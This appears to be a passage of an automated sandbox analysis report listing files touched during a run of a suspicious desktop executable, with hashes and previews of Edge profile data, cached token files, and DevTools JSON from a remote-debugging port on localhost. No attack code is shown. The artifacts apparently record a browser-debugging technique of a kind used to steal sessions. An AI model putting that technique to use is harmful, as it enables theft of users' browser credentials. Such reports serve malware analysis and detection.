                                                                                                                                                                                                                                                                              SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                                                              Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                              MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                              SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                              SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                              SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:uriCache_

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                                                                              Entropy (8bit):5.020523446526973
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclRyJQY4Yn:YWLSGTt1o9LuLgfGBPAzkVj/T8lBVY
                                                                                                                                                                                                                                                                              MD5:B44AAF236C5454C995DC024AEDFA3DC1
                                                                                                                                                                                                                                                                              SHA1:48C3ED317E64CF3F98101A1C256BF042BF11054A
                                                                                                                                                                                                                                                                              SHA-256:36C02B60B349264EE2F3265605D466647F6F8077A30D17ECC155AE2784606B7E
                                                                                                                                                                                                                                                                              SHA-512:DE2C0251205898DCFD0B35B667E5007A6F42CAB828ED16E1D9EEE3182363E3744A3C7350E032475BDE2F382509888BAB183F49EB580B2AAFE631C3FB4962E162
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1734781337519587}]}

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                              Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                              MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                              SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                              SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                              SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c7d024dc-8c5b-4666-bd71-0a29e28115d5.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                              Size (bytes):57639
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103549110629139
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynSPGWv/sxtwfj7VLyMV/YoskFoz:z/0+zI7ynGv/4KnVeZoskG
                                                                                                                                                                                                                                                                              MD5:F263B751997282FC006CE4B5999E237F
                                                                                                                                                                                                                                                                              SHA1:EC62C3CFEA42F51E2BF75590208DB932B0E81343
                                                                                                                                                                                                                                                                              SHA-256:30AABDB5ED5C0C5C6E370DB38083F5EF40A6984F72793B3E32477B9A391BC2D0
                                                                                                                                                                                                                                                                              SHA-512:27686BBFE1EB90D8C02926C9317896263DDF2A057822CF360247D2A9E6BF057E67D63ACBC4BA245D30DEF66092BF5A23231CE0E3790F6CFCDE8C9652A0B05F07
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d91436c6-8433-4ee4-b812-18c5003a3a5c.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):59005
                                                                                                                                                                                                                                                                              Entropy (8bit):6.100662399565544
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:LMk1rT8HnaSPGWv/sxtwKVOFof7VLyMV/YosI:LMYrT8HZv/4KeuAVeZosI
                                                                                                                                                                                                                                                                              MD5:66DBBFC02EAB5D3EB2C3FD3BEF43352B
                                                                                                                                                                                                                                                                              SHA1:8429A57A12CEDBB6C6975DB7BA099DCD39BFF625
                                                                                                                                                                                                                                                                              SHA-256:9AAC540D9A33CD24157FCF3177871D1E8442D0950E4CB5D52B73316529AE52B6
                                                                                                                                                                                                                                                                              SHA-512:A7D78F4D90355B7434C65D3E68FD932447FC733AB276F5ABC610A172763381E9B687F82DE19D4B284EAB304854FCF8D55562EC33BF386E4D93B01E7C54BD102D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5164b344-c4ed-43b8-ad53-2b912e4423f7"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ec5d2664-89b9-438b-bdf8-17a56354bdec.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):56066
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103038538835172
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynCPGWv/sxtwz7VLyMV/YoskFoz:z/0+zI7yn2v/4KfVeZoskG
                                                                                                                                                                                                                                                                              MD5:1493482BF2137752290BC320FB3E4DF5
                                                                                                                                                                                                                                                                              SHA1:1E61B03FD0D1710CC85D7346DEF286C7C0A6441F
                                                                                                                                                                                                                                                                              SHA-256:3C2967E1451BCF9EAA855BB0BB924A7E6E0B21107AE5ED990CCD299AF9A2D733
                                                                                                                                                                                                                                                                              SHA-512:9EECE4AE9E25E3FCD2B0C98F2F99D204412B621AA7DEA027C51F123FFE682B7C4090F0628724682D78EC07720BFB2B3537E138143A079C1F085933C2FC50BCC6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2278
                                                                                                                                                                                                                                                                              Entropy (8bit):3.834963556423681
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:uiTrlKxrgxcUxl9Il8ubbbexJ8LKuK3k2Thj2I6C4VBKtfYgmxd1rc:mFoYdGJmKtk2TFj6tVBKtA/S
                                                                                                                                                                                                                                                                              MD5:0DCD77E095677225A64A00531A3D192C
                                                                                                                                                                                                                                                                              SHA1:37BF6A66EB425D013796E6F28540FD7311CCB95E
                                                                                                                                                                                                                                                                              SHA-256:D50293C8BD25C636C85D41D259BFA5A441A71365D3BBCAD24D4823E3F5B03FD6
                                                                                                                                                                                                                                                                              SHA-512:B875E6EF8C17B10846366F7A44B907F2BF87239267B736EB0CCDCCFBC47CA3846EF51B2B314F07B978012CE4EB401850325CE937D210FAA2D7EFBA9A989A2899
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.G.R.7.E.r.t.S.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.U.v.l.V.k.A.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4622
                                                                                                                                                                                                                                                                              Entropy (8bit):3.9979713677285034
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:kYdbCO1XQ6oI5SRWGMVLaHOgMSI+AEK0bpLaxJf+QsG0F5GOm:kmbdlQ6oUAWHhaH1IZErpuN0TGOm
                                                                                                                                                                                                                                                                              MD5:1FFADF90D9C9E7BA3DF1C3CC12092155
                                                                                                                                                                                                                                                                              SHA1:9BA8D6D380E1943DB1D6A5F90D97E19F6E234471
                                                                                                                                                                                                                                                                              SHA-256:8E53B58B745787BAB7065B6351F46D0FDAE2F08FF81610E53A481C0FFDAA33F0
                                                                                                                                                                                                                                                                              SHA-512:8810F1743EDB7F2C0C097938FF0D3F0057EA4040B5E63191EFF1F2A1036D4461A74C81E00DADD3BB347827B108240D4D0AEECC9DF1D4EEF2ED8E2C0892756EC1
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".3.u.U.i.+.L.J.S.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.U.v.l.V.k.A.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2684
                                                                                                                                                                                                                                                                              Entropy (8bit):3.8996830596474186
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:uiTrlKx68Wa7xMyxl9Il8ubbbPoTzxRLepX7JFmAz5TMXbQI7kH3d/vc:aRYdngfbuL71zt0bN70C
                                                                                                                                                                                                                                                                              MD5:2B07402AA6CB98AFF8A2954BFB1A166F
                                                                                                                                                                                                                                                                              SHA1:52AEF82D56FA8F0435EE9B24FCB2C21E85205975
                                                                                                                                                                                                                                                                              SHA-256:B303C5BD6FBB976F488793F1FAF798E7C86DB01EFF81CE39D80568374CA6651B
                                                                                                                                                                                                                                                                              SHA-512:4DB9A658D662D675D5D6DC1BF0FC09529C72F16842D98E904BDBFA4E1033DAD5B3F59BB3DB2016CA2F6C6B0E5F4F0429141E1A33BBB2A25FC7D0DFDDD97A8C35
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".c.+.N.r.K.I.R.x.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.U.v.l.V.k.A.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\json[1].json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3500
                                                                                                                                                                                                                                                                              Entropy (8bit):5.398078230569568
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:6NnCxATHCxkNnCMbCdNnCw9CqNnCZdgECMNnCQCdNnCgDC0NnCMwCINnCq3Cm:6N+AqkNgNrNCPNSNnBN1CNV
                                                                                                                                                                                                                                                                              MD5:AB06C90794D4E45C84F553432BFE0324
                                                                                                                                                                                                                                                                              SHA1:802C87D08C40E5E9520EAF330D6B8301563FC5C5
                                                                                                                                                                                                                                                                              SHA-256:66BB75ABAA81C19284CCDF11B0F3C5846A7BF61731CC445BFE64B8E6EF4E04AE
                                                                                                                                                                                                                                                                              SHA-512:A3BEF3E5D52CC8F079575F49A3F86F2E55E4D0BB33EFE68F8E0E7CCD6EA9EB8F244BC09B0AC20371A0A282D2250CE7696B641E6777699278199620D466DF7B1B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/1D6BCEFF3D62ECB13633E925AB452356",.. "id": "1D6BCEFF3D62ECB13633E925AB452356",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/1D6BCEFF3D62ECB13633E925AB452356"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/F3B5D31AFA161F13ABB7582DFF6C327D",.. "id": "F3B5D31AFA161F13ABB7582DFF6C327D",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/F3B5D31AFA161F13ABB7582DFF6C327D"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\json[1].json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1787
                                                                                                                                                                                                                                                                              Entropy (8bit):5.366885335382368
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:SfNaoCoOXTECohfNaoC0C6fNaoCpCofNaoC7rK0UrU0U8C7z:6NnCoOXTECo9NnC0CCNnCpC0NnC7rK0x
                                                                                                                                                                                                                                                                              MD5:A7400ABD98AAE91AA7871ACD07631B4D
                                                                                                                                                                                                                                                                              SHA1:83B8445F88F2BE65724DAA33A3BC57C2CEE846D5
                                                                                                                                                                                                                                                                              SHA-256:D5AA8776F5AEAA1EE5FFF55F5C07CC38F498F92A648B1C077C6C8759AE77480C
                                                                                                                                                                                                                                                                              SHA-512:FD75BE45C18C11B1C6B1F94997ABFF371C34E1E665A7607F75E3C5215EA4D0F855E5D106F2B9C497F7D1069822C1EACFB13CC3B83AC3BDC03DE76193571FE74A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/24266637C3BE59FACB76B15B8422B470",.. "id": "24266637C3BE59FACB76B15B8422B470",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/24266637C3BE59FACB76B15B8422B470"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/6480BE37AC25E1189CEE8149225021EA",.. "id": "6480BE37AC25E1189CEE8149225021EA",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/6480BE37AC25E1189CEE8149225021EA"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\1c4c24ae-dff5-46c2-ae60-cd43cd532a5f.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1
